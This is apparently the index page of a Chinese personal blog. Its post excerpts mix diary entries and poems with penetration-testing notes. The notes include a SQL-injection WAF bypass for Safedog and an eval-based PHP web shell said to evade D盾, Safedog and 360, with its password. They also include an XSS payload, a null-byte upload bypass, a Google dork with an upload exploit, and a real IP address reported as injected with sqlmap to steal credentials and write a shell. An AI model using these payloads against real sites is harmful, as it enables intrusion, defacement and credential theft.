in Code audit

今年的冬天来得特别冷,冷走了我的至亲今年的冬天来得太突然,唐突走了我的爱情!我今年比去年更加迷茫,更加无措!我天真以为明天是属于我的,但是今天今日,令我不能就怀,我不想做什么,更不能做什么。从我家庭条件出发,局限我的,嘀咕嘀咕什么的都远去!当面对面,我还是说算了吧,不是明日不够勾人,而是昨天太多沧桑

in Actual

三年的汇聚,看透了些东西,愈来愈惆怅,年龄增长的同时少了锋芒!践行简化的行事风格,都发现自己变大了!更多的张然还有在一些事情上的,我要我自己学会静下心来!去体会事情的,在更多事情上不要被情绪左右,我宁愿做所谓的上道无情,有情更在朝夕!这次期中考试多有不如意,希望我现在放弃玩乐,放弃游戏,放弃H...

in Actual

理想的是我的博客没有被空间商被删!当世界不在拥有光明,当世界不在拥有你我与你的点点 可能真的如书中说的,我已经被你的爱牢牢锁住心脏;在每天措不及防之中体会不经意的惊喜!然而在灯火灿然的夜,想起你,何尝不是趣事!正因为在乎你,不知不觉为你着想;正因为在乎你,才不会冒冒失失;正因为在乎你,难免多增...

in Actual

凯歌直上,上青天,天上宫宿知几何?唉声两两,下九幽,地下幽州路几回!高堂之白发且长,垂髫之稽泪且流。问天地,何人与焉?抚乳之恩悠悠,苍天之愿恍荒!

in Actual

多少次的不期而遇才能收获一辈子的幸福,而我们只是一次不浪漫的邂逅却让我陷入了无尽的相思中。不,不能说是邂逅吧,只能说是一面之缘。但在茫茫人海,在不确定的时间,不确定的地点,在未知未来的长河里,我遇见你,是人生最美丽的意外。   一直很喜欢这样一句话:向来情深,奈何缘浅,却不悔相思。一见钟情是我...

in Actual

我喜欢自己是寂静的—— 我喜欢自己是寂静的我喜欢自己是寂静的如同一只蝴蝶死在春天里纵使你在花朵中藏满心语我的视听无法触及你我喜欢自己是寂静的如同夏晚沉默的星群我与沉默寂寞对话让我坠落在你的目光里我喜欢自己是寂静的如同一片秋叶是静美的我飘落在山涧的谷底安葬我冰冷的魂灵我喜欢自己是寂静的如同冬日飞...

in Actual

曾经暗恋的她曾经暗恋的她曾经读过的一本书只是看清了人物却没有读懂里面的故事一幅画,风景很美色彩也非常鲜艳却不知道作者和背景只是禁不住喜欢她以为这就是上帝最杰出的作品原来,根本不是这么回事只是当时执迷不悟直到,很多年以后才知道她不是有意在骗我

in Technology

目前测试版本是3.5.1测试后发安全狗知识拦截了联合select和一些常用的函数当我们换成:/*!50000select/虽然过狗,但是查询错误可以利用/*!50000union/*!*//*!50000select/*!*/1,2,3,4,current_user,6,7,8,9,10,11...

in Technology

115.28.136.84:83/companyNews.php?Id=7 |使用sqlmap自动化注入拿到账号密码,注入交互写入shellhttp://www.puteulanus.com/crossdomain.xml|crossdomain.xml domain值为*,可能造成非法窃取目...

in Code audit

` $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; 根目录下其他他文件都做了很好的过滤,对数字型变量几乎都用了intval()做限制,唯独漏了这个文件,居然只是用了trim()去除头尾空格。第19行: $ad = $db...

in Technology

1 FootPrinting要收集的信息有十个方面 A 网站注册信息 B网管资料 C 共享资料 D 端口信息 E FTP资源 F 网络拓扑结构 G 网站URL地址结构 H网站系统版本 I 后台地址 J 弱口令常用语法 intext allintext intitle allintitle...

in Tools

很简单,下面两条命令就可以安装了sudo apt install zsh curlsh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"然后编辑...

in Code audit

本人技术渣,基础不牢,且费力审计 class Challenge { const UPLOAD_DIRECTORY = './solutions/'; private $file; private $whitelist; public function __c...

in TechnologyTools

划重点PHP版本低于5.3.4划重点PHP版本低于5.3.41.在url中加入%00,如http://xxxx/shell.php%00.jpg2.在burpsuite的16进制编辑工具将”shell.php .jpg”(带空格的)中间的空格由20改成00在1中,url中的%00(形如%xx)...

in Technology

命令注入攻击(command/shell injection)是通过目标主机上某个程序的漏洞来执行攻击者想要执行的命令。命令注入攻击常用在向程序传入不安全参数(命令行参数、http头、cookie)。下面看一个简单的例子:下面这段代码包装了cat命令:include <stdio.h&g...

in TechnologyTools

git clone https://github.com/joker25000/Devploitcd Devploit chmod +x install ./install在终端中运行:Devploit属性:DNS查找 Whois查询 GeoIP查询 子网查找 端口扫描仪 提取链接 区域转移 ...

in TechnologyTools

安装pip install dirhunt搜索目录:$dirhunt http://blog.xnjz.me/

in TechnologyTools

信息收集:NMAPSetoolkit端口扫描主机到IPwordpress用户C++MS扫描仪XSStracerDork - Google Dorks Passive Vulnerability Auditor扫描服务器的用户密码攻击:C++uppNcrack无线测试:掠夺者pixiewps开发...

in Tools

# -- coding: utf-8 -- import requests import threading import random ban = """ 01000011 01010110 01000101 00101101 00110010 00110000 00110001 001...

in Tools

<img src="#" onerror="alert(111)">

in Tools

其他waf 杀毒软件自己测试,只测试了D盾,安全狗,360D盾,360<?php $a ="www.yuag.com"; function yuag($a){ eval($a); } @ yuag($_POST['laopeng']); 密码:laopeng过D盾过安...

in 渗透测试

谷歌关键字:inurl:newslist.asp?NodeCode=利用方式:/admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

in Tools

终端输入命令:curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > ms...